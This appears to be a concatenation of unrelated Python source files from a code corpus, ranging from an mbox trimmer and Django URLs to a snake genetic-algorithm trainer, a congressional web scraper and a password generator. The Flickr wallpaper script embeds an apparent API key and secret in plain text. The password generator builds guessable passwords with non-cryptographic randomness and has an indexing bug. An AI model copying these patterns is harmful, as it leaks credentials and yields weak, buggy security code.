"""The purpose of this function is to count the messages in the mailbox,
rewind the mailbox seek pointer, and then return the number of messages in
the mailbox file."""
count = 0
while 1:
line = file.readline()
if not line: break
if line[:5] == "From ":
count = count + 1
file.seek(0)
return count
def trim(file, keep):
"""This purpose of this function is to perform the actual trimming of the
mailbox file."""
count = count_messages(file)
print "\nThere are %d messages in the mailbox file." % count
if count <= keep:
print "\nThis file already contains less than the desired number of"
print "messages. Nothing to do."
return
remove = count - keep
print "\nNeed to remove %d messages..." % remove
tempfilename = mktemp()
tempfile = open(tempfilename, "w")
copying = 0
while 1:
line = file.readline()
if not line: break
if line[:5] == "From ":
if remove:
remove = remove - 1
continue
else:
copying = 1
if not copying:
continue
tempfile.write(line)
tempfile.close()
copyfile(tempfilename, file.name)
os.unlink(tempfilename)
def main():
"""This function expects sys.argv to be set appropriately with the
required options, mentioned in the module's docstring. It is the entry
point for the rest of the program."""
if len(sys.argv) != 3:
error("Usage: %s <number to keep> <mbox file>\n" % sys.argv[0])
sys.exit(1)
keep = string.atoi(sys.argv[1])
filename = sys.argv[2]
if not os.path.exists(filename):
error("ERROR: File %s does not exist\n" % filename)
sys.exit(1)
print "Trimming %s to %d messages..." % (filename, keep)
file = open(filename, "r")
trim(file, keep)
file.close()
print "\nDone trimming %s." % filename
if __name__ == '__main__': main()
|
nilq/baby-python
|
python
|
# 'hello_module.py'
def helloworld():
print ("Hello World!")
def goodbye():
print ("Good Bye Dear!")
|
nilq/baby-python
|
python
|
from django.conf.urls import url
from django.views.decorators.csrf import csrf_exempt
from .views import OrderView, PayNotifyView, OrderQueryView
urlpatterns = [
url(r"^order/$", OrderView.as_view(), name="order"),
url(r"^notify/$", csrf_exempt(PayNotifyView.as_view()), name="notify"),
url(r"^orderquery/$", OrderQueryView.as_view(), name="orderquery"),
]
|
nilq/baby-python
|
python
|
import flickr_api
import win32api, win32con, win32gui
username = 'NASA Goddard Photo and Video'
flickr_api.set_keys(api_key='73ec08be7826d8b0a608151ce5faaf9d', api_secret='fbb2fcd772ce44a6')
user = flickr_api.Person.findByUserName(username)
photos = user.getPublicPhotos()
print photos[0]
photos[0].save(photos[0].title+".jpg")
def setWallpaper(path):
key = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER,"Control Panel\\Desktop",0,win32con.KEY_SET_VALUE)
win32api.RegSetValueEx(key, "WallpaperStyle", 0, win32con.REG_SZ, "0")
win32api.RegSetValueEx(key, "TileWallpaper", 0, win32con.REG_SZ, "0")
win32gui.SystemParametersInfo(win32con.SPI_SETDESKWALLPAPER, path, 1+2)
if __name__== "__main__":
path = r'C:\Users\djs04_000\documents\visual studio 2013\Projects\WallSpace\WallSpace\Hubble Observes One-of-a-Kind Star Nicknamed ?Nasty?.jpg'
setWallpaper(path)
|
nilq/baby-python
|
python
|
import math
from error import Error
from dataclasses import dataclass
class Value:
def add(self, other):
self.illegal_operation()
def subtract(self, other):
self.illegal_operation()
def multiply(self, other):
self.illegal_operation()
def divide(self, other):
self.illegal_operation()
def mod(self, other):
self.illegal_operation()
def eq(self, other):
self.illegal_operation()
def ne(self, other):
self.illegal_operation()
def lt(self, other):
self.illegal_operation()
def gt(self, other):
self.illegal_operation()
def le(self, other):
self.illegal_operation()
def ge(self, other):
self.illegal_operation()
def and_(self, other):
self.illegal_operation()
def or_(self, other):
self.illegal_operation()
def xor(self, other):
self.illegal_operation()
def plus(self):
self.illegal_operation()
def minus(self):
self.illegal_operation()
def not_(self):
self.illegal_operation()
def invert(self):
self.illegal_operation()
def pound(self):
self.illegal_operation()
def illegal_operation(self):
raise Error('Illegal operation')
def __repr__(self):
return f'{self.value}'
@dataclass
class Number(Value):
value: float
def add(self, other):
if isinstance(other, Number):
return Number(self.value + other.value)
else:
self.illegal_operation()
def subtract(self, other):
if isinstance(other, Number):
return Number(self.value - other.value)
else:
self.illegal_operation()
def multiply(self, other):
if isinstance(other, Number):
return Number(self.value * other.value)
else:
self.illegal_operation()
def divide(self, other):
if isinstance(other, Number):
return Number(self.value / other.value)
else:
self.illegal_operation()
def mod(self, other):
if isinstance(other, Number):
return Number(self.value % other.value)
else:
self.illegal_operation()
def eq(self, other):
if isinstance(other, Number):
return Number(float(self.value == other.value))
else:
return Number(0.0)
def ne(self, other):
if isinstance(other, Number):
return Number(float(self.value != other.value))
else:
return Number(1.0)
def lt(self, other):
if isinstance(other, Number):
return Number(float(self.value < other.value))
else:
return self.illegal_operation()
def gt(self, other):
if isinstance(other, Number):
return Number(float(self.value > other.value))
else:
return self.illegal_operation()
def le(self, other):
if isinstance(other, Number):
return Number(float(self.value <= other.value))
else:
return self.illegal_operation()
def ge(self, other):
if isinstance(other, Number):
return Number(float(self.value >= other.value))
else:
return self.illegal_operation()
def and_(self, other):
if isinstance(other, Number):
return Number(float(bool(self.value) and bool(other.value)))
else:
return self.illegal_operation()
def or_(self, other):
if isinstance(other, Number):
return Number(float(bool(self.value) or bool(other.value)))
else:
return self.illegal_operation()
def xor(self, other):
if isinstance(other, Number):
return Number(float(bool(self.value) != bool(other.value)))
else:
return self.illegal_operation()
def plus(self):
return Number(+self.value)
def minus(self):
return Number(-self.value)
def not_(self):
return Number(float(not bool(self.value)))
def invert(self):
return Number(float(~math.floor(self.value)))
def __repr__(self):
return f'{self.value}'
@dataclass
class String(Value):
value: str
def add(self, other):
if isinstance(other, String):
return String(self.value + other.value)
else:
self.illegal_operation()
def eq(self, other):
if isinstance(other, String):
return Number(float(self.value == other.value))
else:
return Number(0.0)
def ne(self, other):
if isinstance(other, String):
return Number(float(self.value != other.value))
else:
return Number(1.0)
def pound(self):
return Number(float(len(self.value)))
def __repr__(self):
return f'{self.value}'
@dataclass
class At(Value):
def eq(self, other):
return Number(float(isinstance(other, At)))
def ne(self, other):
return Number(float(not isinstance(other, At)))
def __repr__(self):
return '@'
@dataclass
class Func(Value):
func: any
def __repr__(self):
return '<function>'
|
nilq/baby-python
|
python
|
#
# Memento
# Backend
# Notification Models
#
import re
from datetime import datetime
from sqlalchemy.orm import validates
from ..app import db
# defines a channel where notifications are sent
class Channel(db.Model):
# kinds/types
class Kind:
Task = "task"
Event = "event"
Notice = "notice"
# model fields
id = db.Column(db.Integer, primary_key=True)
kind = db.Column(db.String(64), nullable=False)
# relationships
user_id = db.Column(db.Integer, db.ForeignKey("user.id"), nullable=False)
notifications = db.relationship("Notification", backref=db.backref("channel"),
lazy=True)
@validates('kind')
def validate_kind(self, key, kind):
kind_list = [Channel.Kind.Task,
Channel.Kind.Event,
Channel.Kind.Notice]
if not kind:
raise AssertionError("kind must not be empty")
elif kind not in kind_list:
raise AssertionError('Enter either Event , Task or Notice')
else:
return kind
# defines a notification that is send to a channel
class Notification(db.Model):
# model fields
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(256), nullable=False)
description = db.Column(db.String(1024), nullable=True)
firing_time = db.Column(db.DateTime, nullable=False) # utc timezone
# relationships
channel_id = db.Column(db.Integer, db.ForeignKey("channel.id"), nullable=True)
@validates('title')
def validate_title (self, key, title):
if not title:
raise AssertionError('title must not be empty')
elif len(title) < 2 or len(title) > 256:
raise AssertionError('must be between 2 to 256 characters long')
else:
return title
@validates('description')
def validate_description (self, key, description):
if len(description) > 1024:
raise AssertionError("Description must not exceed 1024 characters")
else:
return description
## convenience properties
# checks if the notification is pending firing
# returns True if pending firing False otherwise
@property
def pending(self):
time_till_fire = (self.firing_time - datetime.utcnow()).total_seconds()
# max secs after firing time for a notification to be considered still pending
pending_window = 60.0
return True if time_till_fire > -pending_window else False
|
nilq/baby-python
|
python
|
import unittest
from unittest.mock import Mock
from pydictionaria import sfm_lib
from clldutils.sfm import SFM, Entry
def test_normalize():
from pydictionaria.sfm_lib import normalize
sfm = SFM([Entry([('sd', 'a__b')])])
sfm.visit(normalize)
assert sfm[0].get('sd') == 'a b'
def test_split_join():
from pydictionaria.sfm_lib import split, join
assert split(join(['a', 'b'])) == ['a', 'b']
def test_Entry():
from pydictionaria.sfm_lib import Entry
e = Entry.from_string("""
\\lx lexeme
\\hm 1
\\marker value
""")
assert e.id == 'lexeme 1'
e.upsert('marker', 'new value')
assert e.get('marker') == 'new value'
e.upsert('new_marker', 'value')
assert e.get('new_marker') == 'value'
def test_ComparisonMeanings(mocker):
from pydictionaria.sfm_lib import Entry, ComparisonMeanings
class Concepticon(object):
conceptsets = {1: mocker.Mock(id='1', gloss='gloss', definition='definition')}
def lookup(self, *args, **kw):
return [[(None, 1)]]
cm = ComparisonMeanings(Concepticon())
e = Entry([('lx', 'lexeme'), ('de', 'meaning')])
cm(e)
assert 'gloss' in e.get('zcom2')
e = Entry([('lx', 'lexeme'), ('ge', 'gl.oss')])
cm(e)
assert 'gloss' in e.get('zcom2')
class ExampleExtraction(unittest.TestCase):
def test_separate_examples_from_entry(self):
example_markers = {'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text'),
('xe', 'translation'),
('dt', 'time stamp')])
new_entry = extractor(entry)
examples = list(extractor.examples.values())
example = examples[0]
self.assertEqual(new_entry, [
('lx', 'headword'),
('xref', example.id),
('dt', 'time stamp')])
def test_marker_mapping(self):
example_markers = {'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text'),
('xe', 'translation')])
extractor(entry)
examples = list(extractor.examples.values())
example = examples[0]
self.assertEqual(example, [
('ref', example.id),
('tx', 'primary text'),
('ft', 'translation'),
('lemma', 'headword')])
def test_generation_of_lemma_marker(self):
# Side Question: Is it bad that the lemma marker is appended to the end?
example_markers = {'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text'),
('xe', 'translation')])
extractor(entry)
examples = list(extractor.examples.values())
example = examples[0]
self.assertEqual(example, [
('ref', example.id),
('tx', 'primary text'),
('ft', 'translation'),
('lemma', 'headword')])
def test_merging_of_lemma_marker(self):
example_markers = {'lemma', 'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('lemma', 'other_headword'),
('xv', 'primary text'),
('xe', 'translation')])
extractor(entry)
examples = list(extractor.examples.values())
example = examples[0]
self.assertEqual(example, [
('ref', example.id),
('lemma', 'other_headword ; headword'),
('tx', 'primary text'),
('ft', 'translation')])
def test_multiple_examples(self):
example_markers = {'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('xv', 'primary text 2'),
('xe', 'translation 2'),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example2 = examples[1]
self.assertEqual(example2, [
('ref', example2.id),
('tx', 'primary text 2'),
('ft', 'translation 2'),
('lemma', 'headword')])
example3 = examples[2]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
def test_there_might_be_stuff_before_xv(self):
example_markers = {'rf', 'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('rf', 'source 1'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('rf', 'source 2'),
('xv', 'primary text 2'),
('xe', 'translation 2'),
('rf', 'source 3'),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('rf', 'source 1'),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example2 = examples[1]
self.assertEqual(example2, [
('ref', example2.id),
('rf', 'source 2'),
('tx', 'primary text 2'),
('ft', 'translation 2'),
('lemma', 'headword')])
example3 = examples[2]
self.assertEqual(example3, [
('ref', example3.id),
('rf', 'source 3'),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
def test_there_might_be_stuff_after_xe(self):
example_markers = {'xv', 'xe', 'z0'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('z0', 'gloss ref 1'),
('xv', 'primary text 2'),
('xe', 'translation 2'),
('z0', 'gloss ref 2'),
('xv', 'primary text 3'),
('xe', 'translation 3'),
('z0', 'gloss ref 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('z0', 'gloss ref 1'),
('lemma', 'headword')])
example2 = examples[1]
self.assertEqual(example2, [
('ref', example2.id),
('tx', 'primary text 2'),
('ft', 'translation 2'),
('z0', 'gloss ref 2'),
('lemma', 'headword')])
example3 = examples[2]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('z0', 'gloss ref 3'),
('lemma', 'headword')])
def test_missing_xe(self):
example_markers = {'xv', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('xv', 'primary text 2'),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example3 = examples[1]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
def test_xv_in_the_middle(self):
example_markers = {'xv', 'mid1', 'mid2', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('mid1', 'mid1 1'),
('xv', 'primary text 1b'),
('mid2', 'mid2 1'),
('xe', 'translation 1')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1 primary text 1b'),
('mid1', 'mid1 1'),
('mid2', 'mid2 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
def test_rf_in_the_middle(self):
example_markers = {'rf', 'xv', 'mid1', 'mid2', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('rf', 'source 1'),
('xv', 'primary text 1'),
('mid1', 'mid1 1'),
('rf', 'source 2'),
('xv', 'primary text 2'),
('mid2', 'mid2 2'),
('xe', 'translation 2')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('rf', 'source 2'),
('tx', 'primary text 2'),
('mid2', 'mid2 2'),
('ft', 'translation 2'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
def test_missing_xe_and_empty_xv(self):
example_markers = {'xv', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('xv', ''),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example3 = examples[1]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
def test_two_xv_markers_at_the_beginning(self):
example_markers = {'rf', 'xv', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('rf', 'source 1'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('rf', 'source 2'),
('xe', 'translation 2'),
('rf', 'source 3'),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('rf', 'source 1'),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example3 = examples[1]
self.assertEqual(example3, [
('ref', example3.id),
('rf', 'source 3'),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
def test_missing_beginning(self):
example_markers = {'rf', 'xv', 'xe', 'other_marker'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('other_marker', 'other marker 1'),
('xe', 'translation 1'),
('other_marker', 'other marker 2'),
('xe', 'translation 2'),
('xv', 'primary text 3'),
('other_marker', 'other marker 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('other_marker', 'other marker 1'),
('ft', 'translation 1'),
# Note: trailing stuff ends up in the previous example, because we
# never know, when an example *truly* ends
('other_marker', 'other marker 2'),
('lemma', 'headword')])
example3 = examples[1]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('other_marker', 'other marker 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
|
nilq/baby-python
|
python
|
# shuffle can randomly shuffles a list, and choice make a choice from a set of different items !
from random import choice, shuffle
# use external module termcolor for genarate beautiful colors
from termcolor import colored, cprint
# using pyfiglet, external module -> we can draw ascii_art very easily !
import pyfiglet
# found_syn function return us synonyms of the word which player enter ! [check synonym.py]
from synonym import found_syn
# colors avaliable for termcolor !
ava_colors = ("red", "blue", "green", "yellow", "blue", "magenta", "cyan")
# decorate func. print statements with different colors
def decorate(str):
cprint(colored(str, choice(ava_colors)))
# ascii_text func. print statements with ascii_art
def ascii_text(str):
text = pyfiglet.figlet_format(str)
decorate(text) # print ascii_art with color
# jumble func. shffle the given word
def jumble(word):
# shuffle can only shuffle list, so make the word list, using inbuild list method
jumble_word = list(word)
# shuffle the list of letters
shuffle(jumble_word)
# join back the letters using inbuild join method !
shuffle_word = ''.join(jumble_word)
# after suffling is the word is same is as given word again shuffle it, else return it !
if(word != shuffle_word):
return shuffle_word
else:
jumble(word)
# display hint msg --> create this to keep our code DRY [Don't repeate yourself !]
def give_hint(hintMsg, hint, word, join="with"):
decorate(f"\n The word {hintMsg} {join} {hint}")
answer = input().lower()
# if after hint player guess it correctly, return True and print CORRECT, and going to next player
if(answer == word):
return True
# show 3 hint to the player !
def get_hint(word):
decorate("Hint ---> ")
while(True):
# 1st hint only shows the first letter of the word
if(give_hint("starts", word[0], word)):
return True
# 2nd hint only shows the last letter of the word
elif(give_hint("ends", word[len(word) - 1], word)):
return True
else:
# 3rd hint shows one nearest meaning[synonyms] of the of the word
# found_syn func, found a synonym and return it ! [check synonym.py]
synonym = found_syn(word)
# if found a synonym show to the user
if(synonym):
if(give_hint("synonyms", choice(synonym), word, "is")):
# after showing synonym if user guess it correctly, show CORRECT
return True
# else show the original answer to the player !
else:
print() # for give one line space !
break
|
nilq/baby-python
|
python
|
from setuptools import setup
setup(
name='COERbuoyOne',
version='0.2.0',
author='Simon H. Thomas',
author_email='simon.thomas.2021@mumail.ie',
packages=['COERbuoyOne'],
url='http://coerbuoy.maynoothuniversity.ie',
license='LICENSE.txt',
description='A realistic benchmark for Wave Enegery Converter controllers',
long_description=open('README.txt').read(),
install_requires=[
"numpy",
"scipy",
"pandas",
"COERbuoy",
],
include_package_data=True,
)
|
nilq/baby-python
|
python
|
from setuptools import setup
setup(
name='ShapeWorld',
version='0.1',
description='A new test methodology for multimodal language understanding',
author='Alexander Kuhnle',
author_email='aok25@cam.ac.uk',
keywords=[],
license='MIT',
url='https://github.com/AlexKuhnle/ShapeWorld',
packages=['shapeworld'],
install_requires=['numpy', 'pillow'])
|
nilq/baby-python
|
python
|
class Solution:
def validWordSquare(self, words):
"""
:type words: List[str]
:rtype: bool
"""
m = len(words)
if m != 0:
n = len(words[0])
else:
n = 0
if m != n:
return False
for x in range(m):
n = len(words[x])
c = 0
#print('x', x)
for y in range(m):
if len(words[y]) < x + 1:
break
c += 1
if c != n:
return False
for y in range(n):
if words[x][y] != words[y][x]:
return False
return True
"""
Given a sequence of words, check whether it forms a valid word square.
A sequence of words forms a valid word square if the kth row and column read the exact same string, where 0 ≤ k < max(numRows, numColumns).
Note:
The number of words given is at least 1 and does not exceed 500.
Word length will be at least 1 and does not exceed 500.
Each word contains only lowercase English alphabet a-z.
Example 1:
Input:
[
"abcd",
"bnrt",
"crmy",
"dtye"
]
Output:
true
"""
|
nilq/baby-python
|
python
|
import matplotlib.pyplot as plt
from models import *
device="cuda:0" if torch.cuda.is_available() else "cpu"
def plot_random():
"""
Plots a random character from the Normal Distribution N[0,5).
No arguments
"""
# dec.eval()
samp=(torch.randn(1,8)*5).float().to(device)
plt.imshow(dec(samp).reshape(28,28).squeeze().detach().cpu().numpy())
return plt.show()
def plot_losses(recloss,dloss,gloss):
"""
Function which plots graph of all losses.
Args:
recloss (list or iterable type object): Object containing recombination loss for each epoch/iteraction.
dloss (list or iterable type object): Object containing discriminator loss.
gloss (list or iterable type object): Object containing generator loss.
"""
plt.plot(recloss,label='recombination loss')
plt.plot(dloss,label='discriminator loss')
plt.plot(gloss,label='gen loss')
plt.legend()
return plt.show()
def interpolate_characters(n,s1,s2,filename=None,cmap=None):
"""
Function which returns a plot of n-linearly interpolated figures between s1 and s2.
Args:
n (Integer): Number of plots you want.
s1 (torch.tensor): Image one.
s2 (torch.tensor): Image two.
filename (String): Name of image you want to store the plot as. Defaults to None.
cmap (String): Custom matplotlib cmap. Defaults to 'Greens'.
"""
f, axarr = plt.subplots(ncols=n)
# dec.eval()
if cmap is not None:
plt.set_cmap(cmap)
else:
plt.set_cmap('Greens')
plt.axis('off')
m=(s2-s1)/n
for i in range(n):
latz=m*(i+1)+s1
image=dec(latz).reshape(28,28).detach().cpu().numpy()
axarr[i].imshow(image)
axarr[i].axis("off")
if filename is not None:
plt.savefig(filename,bbox_inches='tight')
return plt.show()
|
nilq/baby-python
|
python
|
duration_seconds = int(input())
seconds = duration_seconds % 60
temp = duration_seconds // 60
minutes = temp % 60
temp = temp // 60
hours = temp % 60
print(f"{hours}:{minutes}:{seconds}")
|
nilq/baby-python
|
python
|
import pickle
import os
import sys
import genetic_algorithm as ga
import game
import pygame
import numpy as np
import snake
def save(generation, details, filename="generation"):
"""
Saves a snakes generation after checking if a file with same name
already exists (also asks for a new name before exiting)
"""
if not isinstance(filename, str):
raise TypeError("Expected a string, received a " + type(filename).__name__)
for sn in generation:
if not isinstance(sn, snake.snake):
raise TypeError("Expected a snake, received a " + type(sn).__name__)
if not isinstance(details, dict):
raise TypeError("Expected a dictionary, received a " + type(details).__name__)
# setting path filename and checking if it already exists
if not os.path.exists("models"):
os.mkdir('models')
path_filename = "models/" + filename
already_exists = os.path.isfile(path_filename)
if already_exists:
answer = get_yes_no("A file with this name already exists, do you want to overwrite it? [yes/no]")
if not answer:
filename = input("Please enter the new name: ")
save(generation, details, filename)
exit()
with open(path_filename, "wb") as f:
pickle.dump(generation, f)
pickle.dump(details, f)
print(filename + " is correctly saved!")
def load(filename="generation"):
"""
Loads a snakes generation
"""
if not isinstance(filename, str):
raise TypeError("Expected a string, received a " + type(filename).__name__)
# setting path filename and checking if it already exists
path_filename = "models/" + filename
exists = os.path.isfile(path_filename)
if exists:
with open(path_filename, "rb") as f:
generation = pickle.load(f)
details = pickle.load(f)
for sn in generation:
if not isinstance(sn, snake.snake):
raise TypeError("Expected a snake, received a " + type(sn).__name__)
sn.is_alive = True
sn.length = 1
sn.occupied = []
sn.fitness = 0
return generation, details
else:
print("Error: file not found")
exit()
def get_yes_no(question):
"""
Used to get a yes or no answer
"""
if not isinstance(question, str):
raise TypeError("Expected a string, received a " + type(question).__name__)
yes = {"yes", "y", "ye"}
no = {"no", "n"}
while True:
print(question)
answer = input().lower()
if answer in no:
return False
elif answer in yes:
return True
else:
print("Please respond with yes or no!")
def train(generation=[], details={}, snakes=10, shape=[], generations=1,
size=10, view=False, end=100):
"""
Used to train the model
"""
if not isinstance(generation, list):
raise TypeError("Expected a list, received a " + type(generation).__name__)
if not isinstance(details, dict):
raise TypeError("Expected a dict, received a " + type(details).__name__)
if not isinstance(snakes, int):
raise TypeError("Expected an int, received a " + type(snakes).__name__)
if not isinstance(shape, list):
raise TypeError("Expected a string, received a " + type(shape).__name__)
if not isinstance(generations, int):
raise TypeError("Expected an int, received a " + type(generations).__name__)
if not isinstance(size, int):
raise TypeError("Expected an int, received a " + type(size).__name__)
if not isinstance(view, bool):
raise TypeError("Expected a bool, received a " + type(view).__name__)
if not isinstance(end, int):
raise TypeError("Expected an int, received a " + type(end).__name__)
# initializing best results
best_generation = []
best_result = -1
best_index = 0
if not generation:
generation = ga.create_generation(generation, snakes, shape)
else:
for sn in generation:
if not isinstance(sn, snake.snake):
raise TypeError("Expected a snake, received a " + type(sn).__name__)
snakes = len(generation)
size = details["game_size"]
end = details["duration"]
# running the train simulation
for gen in range(generations):
generation = ga.create_generation(generation)
for sn in generation:
g = game.game(size, view, end)
g.add_snake(sn)
while g.snake.is_alive:
g.play()
if view: esc_exit()
result = np.mean([x.fitness for x in generation])
print("generation", gen+1, "/", generations, ":", result)
# updating best results
if result >= best_result:
best_generation = generation
best_result = result
best_index = gen
print("Saving generation", best_index+1, "with a result of", best_result, "...")
best_generation = ga.sort_generation(best_generation)
if not bool(details):
details = {"trained": generations,
"game_size": size,
"duration": end,
"best": best_generation[0].fitness}
else:
details["trained"] += generations
return best_generation, details
def esc_exit():
"""
Used to stop graphical representation
"""
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE: quit()
|
nilq/baby-python
|
python
|
from bs4 import BeautifulSoup
from urllib.request import urlopen, Request
from time import gmtime, strftime
# Get the data from the source
url = "https://www.house.gov/representatives"
url_req = urlopen(Request(url, headers={'User-Agent': 'Mozilla'}))
raw_html = BeautifulSoup(url_req, "lxml")
html = raw_html.prettify()
# Archive data
dir_path = "archive/house/"
time_stamp = strftime("%Y-%m-%dT%H:%M:%S", gmtime())
# # Archive HTML with a timestamp
file_name = dir_path + "html/house-" + time_stamp + ".html"
file = open(file_name, "w")
file.write(str(html))
file.close()
# Archive JSON with a timestamp
json_file_name = dir_path + "json/house-" + time_stamp + ".json"
json = open(json_file_name, "w")
json.write("{\n\t\"members\": [\n")
all_representatives = []
representatives = raw_html("tr")
for representative in representatives[498:]:
information = representative("td")
if len(information) > 0:
full_name = information[0]
state_district = information[1]
party = information[2]
office_room = information[3]
phone = information[4]
website = information[0].find("a").get("href")
committee_assignments = information[5]
# Pretty printing
tab = "\t\t\t"
# Escape quotes in names
get_name = str(full_name.get_text())
formatted_name = get_name.replace('"', r'\"')
# Get first and last name separately
last_name, first_name = formatted_name.split(",")
# Get state and district separately
get_state_district = str(state_district.get_text()).strip()
state, district = get_state_district.rsplit(" ", 1)
if district == "Large":
state, district, district_large = get_state_district.rsplit(" ", 2)
district = district + " " + district_large
# JSON
print_name = tab + "\"full_name\": \"" + first_name.strip() + " " + last_name.strip() + "\",\n"
print_first_name = tab + "\"first_name\": \"" + first_name.strip() + "\",\n"
print_last_name = tab + "\"last_name\": \"" + last_name.strip() + "\",\n"
print_state_district = tab + "\"state_district\": \"" + get_state_district + "\",\n"
print_state = tab + "\"state\": \"" + state + "\",\n"
print_district = tab + "\"district\": \"" + district + "\",\n"
print_party = tab + "\"party\": \"" + str(party.get_text()).strip() + "\",\n"
print_office_room = tab + "\"office_room\": \"" + str(office_room.get_text()).strip() + "\",\n"
print_phone = tab + "\"phone\": \"" + str(phone.get_text()).strip() + "\",\n"
print_website = tab + "\"website\": \"" + website + "\",\n"
print_committee_assignments = ( tab + "\"committee_assignments\": [\"" +
str(committee_assignments.get_text('", "', strip=True)).strip() + "\"]\n" )
print_all = (
"\t\t{\n" +
print_name +
print_first_name +
print_last_name +
print_state_district +
print_state +
print_district +
print_party +
print_office_room +
print_phone +
print_website +
print_committee_assignments +
"\t\t},\n"
)
# Remove trailing comma at end of JSON
if representative == representatives[-1]:
print_all = print_all[:-2] + "\n\t]\n}"
json.write(print_all)
json.close()
|
nilq/baby-python
|
python
|
#PasswordGenerator GGearing314 01/10/19
from random import *
case=randint(1,2)
number=randint(1,99)
animals=("ant","alligator","baboon","badger","barb","bat","beagle","bear","beaver","bird","bison","bombay","bongo","booby","butterfly","bee","camel","cat","caterpillar","catfish","cheetah","chicken","chipmunk","cow","crab","deer","dingo","dodo","dog","dolphin","donkey","duck","eagle","earwig","elephant","emu","falcon","ferret","fish","flamingo","fly","fox","frog","gecko","gibbon","giraffe","goat","goose","gorilla")
colour=("red","orange","yellow","green","blue","indigo","violet","purple","magenta","cyan","pink","brown","white","grey","black")
chosenanimal= animals[randint(0,len(animals))]
chosencolour=colour[randint(0,len(colour))]
if case==1:
chosenanimal=chosenanimal.upper()
print(chosencolour,number,chosenanimal)
else:
chosencolour=chosencolour.upper()
print(chosenanimal,number,chosencolour)
#print("This program has exatly ",(len(animals)*len(colour)*99*2),"different combinations") #I'm not sure this is right
input("Press enter to close...")
|
nilq/baby-python
|
python
|
